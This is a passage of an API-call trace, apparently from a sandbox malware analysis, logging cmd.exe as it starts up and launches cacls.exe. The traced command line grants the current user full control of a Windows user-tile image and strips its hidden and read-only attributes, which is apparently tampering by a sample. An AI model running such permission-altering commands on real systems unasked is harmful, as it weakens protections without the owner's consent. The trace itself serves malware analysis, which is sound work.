lpBuffer=0x30f9c4, dwLength=0x1c | out: lpBuffer=0x30f9c4*(BaseAddress=0x213000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0185.358] VirtualQuery (in: lpAddress=0x310000, lpBuffer=0x30f9c4, dwLength=0x1c | out: lpBuffer=0x30f9c4*(BaseAddress=0x310000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x80000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0185.358] GetConsoleOutputCP () returned 0x1b5 [0185.358] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0185.358] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0185.358] _get_osfhandle (_FileHandle=1) returned 0x7 [0185.358] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0185.358] _get_osfhandle (_FileHandle=1) returned 0x7 [0185.358] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0185.358] _get_osfhandle (_FileHandle=1) returned 0x7 [0185.358] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0185.358] _get_osfhandle (_FileHandle=0) returned 0x3 [0185.358] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0185.358] _get_osfhandle (_FileHandle=0) returned 0x3 [0185.358] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0185.359] GetEnvironmentStringsW () returned 0xb0308* [0185.359] FreeEnvironmentStringsW (penv=0xb0308) returned 1 [0185.359] GetEnvironmentStringsW () returned 0xb0308* [0185.359] FreeEnvironmentStringsW (penv=0xb0308) returned 1 [0185.359] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30e964 | out: phkResult=0x30e964*=0x40) returned 0x0 [0185.359] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30e96c, lpData=0x30e970, lpcbData=0x30e968*=0x1000 | out: lpType=0x30e96c*=0x0, lpData=0x30e970*=0xb8, lpcbData=0x30e968*=0x1000) returned 0x2 [0185.359] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30e96c, lpData=0x30e970, lpcbData=0x30e968*=0x1000 | out: lpType=0x30e96c*=0x4, lpData=0x30e970*=0x1, lpcbData=0x30e968*=0x4) returned 0x0 [0185.359] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30e96c, lpData=0x30e970, lpcbData=0x30e968*=0x1000 | out: lpType=0x30e96c*=0x0, lpData=0x30e970*=0x1, lpcbData=0x30e968*=0x1000) returned 0x2 [0185.359] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30e96c, lpData=0x30e970, lpcbData=0x30e968*=0x1000 | out: lpType=0x30e96c*=0x4, lpData=0x30e970*=0x0, lpcbData=0x30e968*=0x4) returned 0x0 [0185.359] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30e96c, lpData=0x30e970, lpcbData=0x30e968*=0x1000 | out: lpType=0x30e96c*=0x4, lpData=0x30e970*=0x40, lpcbData=0x30e968*=0x4) returned 0x0 [0185.359] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30e96c, lpData=0x30e970, lpcbData=0x30e968*=0x1000 | out: lpType=0x30e96c*=0x4, lpData=0x30e970*=0x40, lpcbData=0x30e968*=0x4) returned 0x0 [0185.359] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30e96c, lpData=0x30e970, lpcbData=0x30e968*=0x1000 | out: lpType=0x30e96c*=0x0, lpData=0x30e970*=0x40, lpcbData=0x30e968*=0x1000) returned 0x2 [0185.359] RegCloseKey (hKey=0x40) returned 0x0 [0185.359] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30e964 | out: phkResult=0x30e964*=0x40) returned 0x0 [0185.359] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30e96c, lpData=0x30e970, lpcbData=0x30e968*=0x1000 | out: lpType=0x30e96c*=0x0, lpData=0x30e970*=0x40, lpcbData=0x30e968*=0x1000) returned 0x2 [0185.359] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30e96c, lpData=0x30e970, lpcbData=0x30e968*=0x1000 | out: lpType=0x30e96c*=0x4, lpData=0x30e970*=0x1, lpcbData=0x30e968*=0x4) returned 0x0 [0185.359] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30e96c, lpData=0x30e970, lpcbData=0x30e968*=0x1000 | out: lpType=0x30e96c*=0x0, lpData=0x30e970*=0x1, lpcbData=0x30e968*=0x1000) returned 0x2 [0185.359] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30e96c, lpData=0x30e970, lpcbData=0x30e968*=0x1000 | out: lpType=0x30e96c*=0x4, lpData=0x30e970*=0x0, lpcbData=0x30e968*=0x4) returned 0x0 [0185.360] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30e96c, lpData=0x30e970, lpcbData=0x30e968*=0x1000 | out: lpType=0x30e96c*=0x4, lpData=0x30e970*=0x9, lpcbData=0x30e968*=0x4) returned 0x0 [0185.360] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30e96c, lpData=0x30e970, lpcbData=0x30e968*=0x1000 | out: lpType=0x30e96c*=0x4, lpData=0x30e970*=0x9, lpcbData=0x30e968*=0x4) returned 0x0 [0185.360] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30e96c, lpData=0x30e970, lpcbData=0x30e968*=0x1000 | out: lpType=0x30e96c*=0x0, lpData=0x30e970*=0x9, lpcbData=0x30e968*=0x1000) returned 0x2 [0185.360] RegCloseKey (hKey=0x40) returned 0x0 [0185.360] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886393 [0185.360] srand (_Seed=0x5b886393) [0185.360] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp\"" [0185.360] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp\"" [0185.360] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0185.360] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xb1a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0185.360] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0185.360] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0185.360] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0185.360] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0185.360] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0185.360] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0185.360] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0185.360] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0185.360] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0185.361] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0185.361] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0185.361] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0185.361] GetEnvironmentStringsW () returned 0xb2458* [0185.361] FreeEnvironmentStringsW (penv=0xb2458) returned 1 [0185.361] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0185.361] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0185.361] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0185.361] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0185.361] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0185.361] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0185.361] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0185.361] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0185.361] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0185.361] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0185.361] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x30f730 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0185.361] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x30f730, lpFilePart=0x30f72c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x30f72c*="Desktop") returned 0x18 [0185.361] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0185.361] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x30f4ac | out: lpFindFileData=0x30f4ac) returned 0xb0ae8 [0185.361] FindClose (in: hFindFile=0xb0ae8 | out: hFindFile=0xb0ae8) returned 1 [0185.361] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x30f4ac | out: lpFindFileData=0x30f4ac) returned 0xb0ae8 [0185.362] FindClose (in: hFindFile=0xb0ae8 | out: hFindFile=0xb0ae8) returned 1 [0185.362] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x30f4ac | out: lpFindFileData=0x30f4ac) returned 0xb0ae8 [0185.362] FindClose (in: hFindFile=0xb0ae8 | out: hFindFile=0xb0ae8) returned 1 [0185.362] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0185.362] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0185.362] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0185.362] GetEnvironmentStringsW () returned 0xb0308* [0185.362] FreeEnvironmentStringsW (penv=0xb0308) returned 1 [0185.362] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0185.363] GetConsoleOutputCP () returned 0x1b5 [0185.363] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0185.363] GetUserDefaultLCID () returned 0x409 [0185.363] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0185.363] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x30f870, cchData=128 | out: lpLCData="0") returned 2 [0185.363] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x30f870, cchData=128 | out: lpLCData="0") returned 2 [0185.363] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x30f870, cchData=128 | out: lpLCData="1") returned 2 [0185.363] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0185.363] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0185.363] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0185.363] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0185.363] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0185.363] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0185.363] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0185.363] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0185.363] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0185.363] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0185.364] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0185.364] GetConsoleTitleW (in: lpConsoleTitle=0xa09b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0185.364] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0185.364] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0185.365] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0185.365] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0185.365] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0185.366] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0185.366] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0185.366] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0185.366] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0185.366] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0185.366] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0185.366] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0185.369] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0185.369] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0185.369] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0185.369] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0185.369] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0185.369] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0185.369] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0185.371] GetConsoleTitleW (in: lpConsoleTitle=0x30f504, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0185.371] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0185.371] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0185.371] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0185.371] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0185.371] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0185.371] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0185.371] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0185.371] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0185.371] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0185.371] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0185.371] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0185.371] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0185.371] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0185.371] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0185.371] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0185.371] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0185.371] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0185.371] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0185.371] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0185.371] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0185.371] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0185.371] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0185.371] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0185.371] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0185.371] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0185.371] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0185.371] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0185.371] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0185.372] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0185.372] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0185.372] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0185.372] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0185.372] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0185.372] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0185.372] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0185.372] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0185.372] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0185.372] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0185.372] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0185.372] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0185.372] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0185.372] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0185.372] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0185.372] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0185.372] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0185.372] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0185.372] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0185.372] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0185.372] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0185.372] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0185.372] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0185.372] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0185.372] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0185.372] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0185.372] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0185.372] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0185.372] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0185.372] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0185.372] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0185.372] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0185.372] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0185.372] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0185.372] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0185.372] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0185.372] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0185.372] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0185.372] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0185.372] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0185.372] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0185.372] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0185.372] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0185.372] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0185.372] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0185.372] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0185.372] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0185.372] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0185.373] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0185.373] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0185.373] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0185.373] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0185.373] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0185.373] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0185.373] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0185.373] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0185.373] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0185.373] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0185.373] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0185.373] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0185.373] SetErrorMode (uMode=0x0) returned 0x0 [0185.373] SetErrorMode (uMode=0x1) returned 0x0 [0185.373] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xb1e98, lpFilePart=0x30f024 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x30f024*="Desktop") returned 0x18 [0185.373] SetErrorMode (uMode=0x0) returned 0x1 [0185.373] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0185.373] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0185.378] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0185.379] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x30eda0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eda0) returned 0xffffffff [0185.379] GetLastError () returned 0x2 [0185.379] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x30eda0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eda0) returned 0xffffffff [0185.379] GetLastError () returned 0x2 [0185.379] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x30eda0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eda0) returned 0xb2180 [0185.379] FindClose (in: hFindFile=0xb2180 | out: hFindFile=0xb2180) returned 1 [0185.380] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x30eda0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eda0) returned 0xffffffff [0185.380] GetLastError () returned 0x2 [0185.380] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x30eda0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eda0) returned 0xb2180 [0185.380] FindClose (in: hFindFile=0xb2180 | out: hFindFile=0xb2180) returned 1 [0185.380] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0185.380] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0185.380] GetConsoleTitleW (in: lpConsoleTitle=0x30f298, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0185.380] InitializeProcThreadAttributeList (in: lpAttributeList=0x30f120, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x30f1e8 | out: lpAttributeList=0x30f120, lpSize=0x30f1e8) returned 1 [0185.380] UpdateProcThreadAttribute (in: lpAttributeList=0x30f120, dwFlags=0x0, Attribute=0x60001, lpValue=0x30f1e0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x30f120, lpPreviousValue=0x0) returned 1 [0185.380] GetStartupInfoW (in: lpStartupInfo=0x30f0dc | out: lpStartupInfo=0x30f0dc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0185.380] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0185.381] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x30f17c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30f1c8 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x30f1c8*(hProcess=0x50, hThread=0x4c, dwProcessId=0xe6c, dwThreadId=0x89c)) returned 1 [0185.389] CloseHandle (hObject=0x4c) returned 1 [0185.389] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0185.389] GetEnvironmentStringsW () returned 0xb0308* [0185.389] FreeEnvironmentStringsW (penv=0xb0308) returned 1 [0185.389] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0185.420] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x30f0bc | out: lpExitCode=0x30f0bc*=0x0) returned 1 [0185.420] CloseHandle (hObject=0x50) returned 1 [0185.420] _vsnwprintf (in: _Buffer=0x30f204, _BufferCount=0x13, _Format="%08X", _ArgList=0x30f0c8 | out: _Buffer="00000000") returned 8 [0185.420] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0185.420] GetEnvironmentStringsW () returned 0xb2410* [0185.420] FreeEnvironmentStringsW (penv=0xb2410) returned 1 [0185.420] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0185.420] GetEnvironmentStringsW () returned 0xb2410* [0185.420] FreeEnvironmentStringsW (penv=0xb2410) returned 1 [0185.420] DeleteProcThreadAttributeList (in: lpAttributeList=0x30f120 | out: lpAttributeList=0x30f120) [0185.420] GetConsoleTitleW 